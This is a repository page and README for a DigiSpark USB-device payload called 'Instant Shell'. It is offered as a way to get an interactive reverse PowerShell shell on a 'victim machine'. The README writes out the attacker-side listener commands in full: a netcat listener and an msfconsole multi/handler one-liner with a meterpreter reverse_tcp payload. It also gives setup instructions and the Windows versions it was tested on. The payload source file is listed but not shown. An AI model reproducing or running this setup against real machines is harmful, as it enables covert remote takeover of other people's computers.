DigiSpark-Payloads/payloads/Instant Shell
Muhammad Talha Khan 2796996240
Update README.md
2021-10-10 17:48:34 +05:00
..
Instant_Shell.ino edit 2021-10-10 17:29:51 +08:00
README.md Update README.md 2021-10-10 17:48:34 +05:00

README.md

Instant Shell

Description:

1: Instant_Shell.ino:

Payload by: hum4nG0D

Get instant interactive reverse powershell shell in less than a minute and send commands remotely to victim machine. Interactive reverse Powershell shell script from Nikhil SamratAshok Mittal

Instructions: Start an nc listener or metasploit listener. Be sure to change IP and Port. Adjust script delay which suits best to your computer.

nc -lvnp 4444
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP_ADDRESS>; set lport 4444; set ExitOnSession false; exploit -j"

Tested on:
OS: Windows 10|11
User: Admin/Normal User
Hardware: ATtiny85